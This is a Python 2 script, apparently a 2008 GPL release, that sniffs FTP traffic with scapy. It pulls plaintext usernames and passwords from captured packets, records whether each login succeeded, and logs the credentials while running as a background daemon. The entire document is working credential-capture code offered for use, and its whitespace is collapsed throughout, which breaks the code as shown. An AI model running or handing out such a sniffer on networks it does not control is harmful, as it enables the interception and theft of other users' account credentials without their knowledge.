Simple FTP Password Sniffer

#!/usr/bin/python###############################################################################                                                                         #### ftp_password_sniffer.py --- Simple FTP password sniffer using scapy     ####              see http://trac.innovacode.com/ for latest release         ####                                                                         #### Copyright (C) 2008  Franck TABARY <franck.tab atat gmail thedot com>    ####                                                                         #### This program is free software; you can redistribute it and/or modify it #### under the terms of the GNU General Public License version 2 as          #### published by the Free Software Foundation; version 2.                   ####                                                                         #### This program is distributed in the hope that it will be useful, but     #### WITHOUT ANY WARRANTY; without even the implied warranty of              #### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU       #### General Public License for more details.                                ####                                                                         ###############################################################################importloggingimportrefromscapyimport*###################################### Define some constants ######################################APP_NAME='ftp_password_sniffer'LOGFILE='/var/log/'+APP_NAME+'.log'PIDFILE='/var/run/'+APP_NAME+'.pid'conf.iface='eth0'conf.verb=0conf.promisc=0last_ftp_login=''last_ftp_pw=''login_success='success'login_failed='failed'log=None############################################### printUsage: display short help ###############################################defprintUsage():print"Password Sniffer."print""print"Usage: password_sniffer [option]"print""print"Valid options:"print"  -h, --help             : display this help"print"  -c, --console          : don't fork into background"print"  -d, --debug            : switch to debug log level"print""################################################################### getFtpCredentiels: extract login/pass from packets ###################################################################defgetFtpCredentials(pkt):globallast_ftp_login,last_ftp_pw,logsrc=pkt.sprintf("%IP.src%")dst=pkt.sprintf("%IP.dst%")sport=pkt.sprintf("%IP.sport%")dport=pkt.sprintf("%IP.dport%")raw=pkt.sprintf("%Raw.load%")ifdport=='21':raw=raw[0:-5]# From clientuser=re.findall("(?i)USER (.*)",raw)ifuser:last_ftp_login=user[0]pw=re.findall("(?i)PASS (.*)",raw)ifpw:last_ftp_pw=pw[0]ifsport=='21':raw=raw[1:-5]# From serverreason=''iflast_ftp_loginandlast_ftp_pw:success=re.findall(r'^230',raw)ifsuccess:status=login_successelse:failed=re.findall(r'^530 (.*)',raw)iffailed:reason=' ('+failed[0]+')'status=login_failedifsuccessorfailed:msg='FTP: Login '+dst+' -> '+src+': '+status+': 'msg=msg+last_ftp_login+': '+last_ftp_pw+reasonlog.info(msg)last_ftp_login=''last_ftp_pw=''########################################################## callback: called for each packet received ##########################################################defcallback(pkt):globallogsport=pkt.sprintf("%IP.sport%")dport=pkt.sprintf("%IP.dport%")raw=pkt.sprintf("%Raw.load%")ifraw!='??':log.debug(raw)# FTPifdport=='21'orsport=='21':getFtpCredentials(pkt)############################################################################# daemonize: if -d param not specified, daemonize this program #############################################################################defdaemonize (stdin='/dev/null',stdout='/dev/null',stderr='/dev/null'):'''This forks the current process into a daemon.    The stdin, stdout, and stderr arguments are file names that    will be opened and be used to replace the standard file descriptors    in sys.stdin, sys.stdout, and sys.stderr.    These arguments are optional and default to /dev/null.    Note that stderr is opened unbuffered, so    if it shares a file with stdout then interleaved output    may not appear in the order that you expect.    '''# Do first fork.try:pid=os.fork()ifpid>0:sys.exit(0)# Exit first parent.exceptOSError,e:sys.stderr.write ("fork #1 failed: (%d) %s\n"% (e.errno,e.strerror) )sys.exit(1)# Decouple from parent environment.os.chdir("/")os.umask(0)os.setsid()# Do second fork.try:pid=os.fork()ifpid>0:sys.exit(0)# Exit second parent.exceptOSError,e:sys.stderr.write ("fork #2 failed: (%d) %s\n"% (e.errno,e.strerror) )sys.exit(1)# Now I am a daemon!# Redirect standard file descriptors.si=open(stdin,'r')so=open(stdout,'a+')se=open(stderr,'a+',0)os.dup2(si.fileno(),sys.stdin.fileno())os.dup2(so.fileno(),sys.stdout.fileno())os.dup2(se.fileno(),sys.stderr.fileno())##################### main #####################defmain():globallogdebugMode=FalseconsoleMode=Falsetry:opts,args=getopt.getopt(sys.argv[1:],'cdh', ['console','debug','help'])exceptgetopt.error,msg:printmsgprint'for help use --help'sys.exit(2)# process optionsforo,ainopts:ifoin ('-h','--help'):printUsage()returnifoin ('-d','--debug'):debugMode=Trueifoin ('-c','--console'):consoleMode=Truelog=logging.getLogger(APP_NAME)ifconsoleMode:handler=logging.StreamHandler()else:handler=logging.FileHandler(LOGFILE)formatter=logging.Formatter('%(asctime)s %(levelname)s %(message)s')handler.setFormatter(formatter)log.addHandler(handler)ifdebugMode==False:log.setLevel(logging.INFO)else:log.setLevel(logging.DEBUG)expr='tcp port 21'log.info("Listening on "+expr)ifdebugMode:log.info("Debug mode activated")ifconsoleMode:log.info("Console mode activated")else:daemonize()try:sniff(filter=expr,prn=callback,store=0)exceptKeyboardInterrupt:exit(0)if__name__=="__main__":main()